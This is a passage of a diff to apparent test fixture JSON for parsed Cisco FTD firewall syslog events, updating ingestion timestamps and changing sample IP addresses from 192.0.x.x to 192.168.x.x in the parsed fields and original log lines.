"10.123.1.35" ] }, "event": { "severity": 6, "duration": 36000000000000, - "ingested": "2021-07-19T09:06:48.994113602Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 666 for outside:192.0.2.222/53 user1 to inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999", + "ingested": "2021-12-09T13:33:04.305710800Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 666 for outside:192.168.2.222/53 user1 to inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999", "code": "302016", "kind": "event", "start": "2013-04-29T02:59:50.000Z", @@ -991,7 +991,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:48.994115397Z", + "ingested": "2021-12-09T13:33:04.305716100Z", "original": "Jun 04 2011 21:59:52 FJSG2NRFW01 : %FTD-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr 192.168.132.46/17233 laddr 192.168.132.46/17233", "code": "302021", "kind": "event", @@ -1016,8 +1016,8 @@ }, "destination": { "port": 10879, - "address": "192.0.0.130", - "ip": "192.0.0.130" + "address": "192.168.0.130", + "ip": "192.168.0.130" }, "source": { "port": 4954, @@ -1053,13 +1053,13 @@ "related": { "ip": [ "192.168.3.42", - "192.0.0.130" + "192.168.0.130" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:48.994117184Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.0.0.130/10879", + "ingested": "2021-12-09T13:33:04.305721600Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.168.0.130/10879", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -1092,8 +1092,8 @@ }, "source": { "port": 80, - "address": "192.0.0.17", - "ip": "192.0.0.17" + "address": "192.168.0.17", + "ip": "192.168.0.17" }, "tags": [ "preserve_original_event" @@ -1124,15 +1124,15 @@ }, "related": { "ip": [ - "192.0.0.17", + "192.168.0.17", "192.168.3.42", "10.0.0.130" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:48.994119011Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743277 for outside:192.0.0.17/80 (192.0.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879)", + "ingested": "2021-12-09T13:33:04.305727Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743277 for outside:192.168.0.17/80 (192.168.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -1148,7 +1148,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "10.0.0.130", - "mapped_source_ip": "192.0.0.17", + "mapped_source_ip": "192.168.0.17", "connection_id": "89743277", "source_interface": "outside", "mapped_destination_port": 10879 @@ -1166,8 +1166,8 @@ }, "source": { "port": 12981, - "address": "192.0.0.66", - "ip": "192.0.0.66" + "address": "192.168.0.66", + "ip": "192.168.0.66" }, "tags": [ "preserve_original_event" @@ -1189,14 +1189,14 @@ }, "related": { "ip": [ - "192.0.0.66", + "192.168.0.66", "10.1.2.60" ] }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:48.994120971Z", - "original": "Apr 30 2013 09:22:33: %FTD-2-106007: Deny inbound UDP from 192.0.0.66/12981 to 10.1.2.60/53 due to DNS Query", + "ingested": "2021-12-09T13:33:04.305732600Z", + "original": "Apr 30 2013 09:22:33: %FTD-2-106007: Deny inbound UDP from 192.168.0.66/12981 to 10.1.2.60/53 due to DNS Query", "code": "106007", "kind": "event", "action": "firewall-rule", @@ -1219,8 +1219,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2006, @@ -1256,13 +1256,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994122823Z", - "original": "Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:33:04.305737900Z", + "original": "Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1289,8 +1289,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49734, @@ -1326,13 +1326,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994124613Z", - "original": "Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:33:04.305743300Z", + "original": "Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1359,8 +1359,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49735, @@ -1396,13 +1396,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994126416Z", - "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:33:04.305748800Z", + "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1429,8 +1429,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49736, @@ -1466,13 +1466,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994128200Z", - "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:33:04.305754300Z", + "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1499,8 +1499,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49737, @@ -1536,13 +1536,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994130050Z", - "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:33:04.305759600Z", + "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1569,8 +1569,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49738, @@ -1606,13 +1606,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994131861Z", - "original": "Apr 30 2013 09:22:40: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:33:04.305765Z", + "original": "Apr 30 2013 09:22:40: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1639,8 +1639,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49746, @@ -1676,13 +1676,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994133818Z", - "original": "Apr 30 2013 09:22:41: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:33:04.305770500Z", + "original": "Apr 30 2013 09:22:41: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1709,8 +1709,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2007, @@ -1746,13 +1746,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994135627Z", - "original": "Apr 30 2013 09:22:47: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:33:04.305776Z", + "original": "Apr 30 2013 09:22:47: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1821,7 +1821,7 @@ }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994137426Z", + "ingested": "2021-12-09T13:33:04.305781400Z", "original": "Apr 30 2013 09:22:48: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.13(43013) -\u003e dmz/192.168.33.31(25) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1849,8 +1849,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2008, @@ -1886,13 +1886,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994139240Z", - "original": "Apr 30 2013 09:22:56: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:33:04.305786800Z", + "original": "Apr 30 2013 09:22:56: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1924,8 +1924,8 @@ }, "source": { "port": 137, - "address": "192.0.2.66", - "ip": "192.0.2.66" + "address": "192.168.2.66", + "ip": "192.168.2.66" }, "tags": [ "preserve_original_event" @@ -1951,14 +1951,14 @@ }, "related": { "ip": [ - "192.0.2.66", + "192.168.2.66", "10.1.2.42" ] }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:48.994141032Z", - "original": "Apr 30 2013 09:23:02: %FTD-2-106006: Deny inbound UDP from 192.0.2.66/137 to 10.1.2.42/137 on interface inside", + "ingested": "2021-12-09T13:33:04.305792Z", + "original": "Apr 30 2013 09:23:02: %FTD-2-106006: Deny inbound UDP from 192.168.2.66/137 to 10.1.2.42/137 on interface inside", "code": "106006", "kind": "event", "action": "firewall-rule", @@ -1988,8 +1988,8 @@ }, "source": { "port": 12981, - "address": "192.0.2.66", - "ip": "192.0.2.66" + "address": "192.168.2.66", + "ip": "192.168.2.66" }, "tags": [ "preserve_original_event" @@ -2011,14 +2011,14 @@ }, "related": { "ip": [ - "192.0.2.66", + "192.168.2.66", "10.1.5.60" ] }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:48.994142817Z", - "original": "Apr 30 2013 09:23:03: %FTD-2-106007: Deny inbound UDP from 192.0.2.66/12981 to 10.1.5.60/53 due to DNS Query", + "ingested": "2021-12-09T13:33:04.305797400Z", + "original": "Apr 30 2013 09:23:03: %FTD-2-106007: Deny inbound UDP from 192.168.2.66/12981 to 10.1.5.60/53 due to DNS Query", "code": "106007", "kind": "event", "action": "firewall-rule", @@ -2041,8 +2041,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2009, @@ -2078,13 +2078,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994144637Z", - "original": "Apr 30 2013 09:23:06: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:33:04.305802800Z", + "original": "Apr 30 2013 09:23:06: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2111,8 +2111,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49776, @@ -2148,13 +2148,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994146438Z", - "original": "Apr 30 2013 09:23:08: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:33:04.305808200Z", + "original": "Apr 30 2013 09:23:08: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2181,8 +2181,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2010, @@ -2218,13 +2218,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994148228Z", - "original": "Apr 30 2013 09:23:15: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:33:04.305813500Z", + "original": "Apr 30 2013 09:23:15: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2251,8 +2251,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2011, @@ -2288,13 +2288,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994150022Z", - "original": "Apr 30 2013 09:23:24: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:33:04.305818800Z", + "original": "Apr 30 2013 09:23:24: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2321,8 +2321,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2012, @@ -2358,13 +2358,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994151808Z", - "original": "Apr 30 2013 09:23:34: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:33:04.305824200Z", + "original": "Apr 30 2013 09:23:34: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2396,8 +2396,8 @@ }, "source": { "port": 53638, - "address": "192.0.2.126", - "ip": "192.0.2.126" + "address": "192.168.2.126", + "ip": "192.168.2.126" }, "tags": [ "preserve_original_event" @@ -2427,14 +2427,14 @@ }, "related": { "ip": [ - "192.0.2.126", + "192.168.2.126", "10.0.0.132" ] }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:48.994153758Z", - "original": "Apr 30 2013 09:23:40: %FTD-4-106023: Deny tcp src outside:192.0.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", + "ingested": "2021-12-09T13:33:04.305829800Z", + "original": "Apr 30 2013 09:23:40: %FTD-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -2466,8 +2466,8 @@ }, "source": { "port": 53638, - "address": "192.0.2.126", - "ip": "192.0.2.126" + "address": "192.168.2.126", + "ip": "192.168.2.126" }, "tags": [ "preserve_original_event" @@ -2497,14 +2497,14 @@ }, "related": { "ip": [ - "192.0.2.126", + "192.168.2.126", "10.0.0.132" ] }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:48.994157201Z", - "original": "Apr 30 2013 09:23:41: %FTD-4-106023: Deny tcp src outside:192.0.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", + "ingested": "2021-12-09T13:33:04.305835200Z", + "original": "Apr 30 2013 09:23:41: %FTD-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -2531,8 +2531,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49840, @@ -2568,13 +2568,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994159038Z", - "original": "Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:33:04.305840600Z", + "original": "Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2601,8 +2601,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2013, @@ -2638,13 +2638,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994160875Z", - "original": "Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:33:04.305847900Z", + "original": "Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2671,8 +2671,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.99", - "ip": "192.0.0.99" + "address": "192.168.0.99", + "ip": "192.168.0.99" }, "source": { "port": 2241, @@ -2708,13 +2708,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.99" + "192.168.0.99" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994162672Z", - "original": "Apr 15 2018 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -\u003e outside/192.0.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:33:04.305853500Z", + "original": "Apr 15 2018 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -\u003e outside/192.168.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2792,7 +2792,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:48.994164482Z", + "ingested": "2021-12-09T13:33:04.305858800Z", "original": "Dec 11 2018 08:01:24 127.0.0.1: %FTD-6-302015: Built outbound UDP connection 447235 for outside:192.168.77.12/11180 (192.168.77.12/11180) to identity:10.0.13.13/80 (10.0.13.13/80)", "code": "302015", "kind": "event", @@ -2822,8 +2822,8 @@ }, "destination": { "port": 53, - "address": "192.0.0.12", - "ip": "192.0.0.12" + "address": "192.168.0.12", + "ip": "192.168.0.12" }, "source": { "port": 5555, @@ -2863,7 +2863,7 @@ ], "ip": [ "192.168.1.33", - "192.0.0.12" + "192.168.0.12" ] }, "host": { @@ -2871,8 +2871,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:48.994166278Z", - "original": "Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.0.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", + "ingested": "2021-12-09T13:33:04.305864200Z", + "original": "Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -2899,8 +2899,8 @@ }, "destination": { "port": 53, - "address": "192.0.0.12", - "ip": "192.0.0.12" + "address": "192.168.0.12", + "ip": "192.168.0.12" }, "source": { "port": 5555, @@ -2940,7 +2940,7 @@ ], "ip": [ "192.168.1.33", - "192.0.0.12" + "192.168.0.12" ] }, "host": { @@ -2948,8 +2948,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:48.994168077Z", - "original": "Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.0.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", + "ingested": "2021-12-09T13:33:04.305869500Z", + "original": "Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -2981,8 +2981,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3018,7 +3018,7 @@ "OCSP_Server" ], "ip": [ - "192.0.2.222" + "192.168.2.222" ] }, "host": { @@ -3026,8 +3026,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:48.994169878Z", - "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", + "ingested": "2021-12-09T13:33:04.305874900Z", + "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3043,7 +3043,7 @@ "mapped_destination_host": "OCSP_Server", "destination_interface": "dmz", "mapped_source_port": 1234, - "mapped_source_ip": "192.0.2.222", + "mapped_source_ip": "192.168.2.222", "connection_id": "447236", "source_interface": "outside", "mapped_destination_port": 5678 @@ -3061,8 +3061,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3098,7 +3098,7 @@ "OCSP_Server" ], "ip": [ - "192.0.2.222" + "192.168.2.222" ] }, "host": { @@ -3106,8 +3106,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:48.994171698Z", - "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", + "ingested": "2021-12-09T13:33:04.305880300Z", + "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3123,7 +3123,7 @@ "mapped_destination_host": "OCSP_Server", "destination_interface": "dmz", "mapped_source_port": 1234, - "mapped_source_ip": "192.0.2.222", + "mapped_source_ip": "192.168.2.222", "connection_id": "447236", "source_interface": "outside", "mapped_destination_port": 5678 @@ -3141,8 +3141,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3177,7 +3177,7 @@ "127.0.0.1" ], "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, @@ -3188,8 +3188,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:48.994173517Z", - "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447236 for outside:192.0.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs", + "ingested": "2021-12-09T13:33:04.305885600Z", + "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447236 for outside:192.168.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs", "code": "302014", "kind": "event", "start": "2018-12-11T08:01:31.000Z", @@ -3222,8 +3222,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3258,7 +3258,7 @@ "127.0.0.1" ], "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.35" ] }, @@ -3269,8 +3269,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:48.994175314Z", - "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", + "ingested": "2021-12-09T13:33:04.305890900Z", + "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", "code": "302014", "kind": "event", "start": "2018-12-11T08:00:30.000Z", @@ -3303,8 +3303,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ 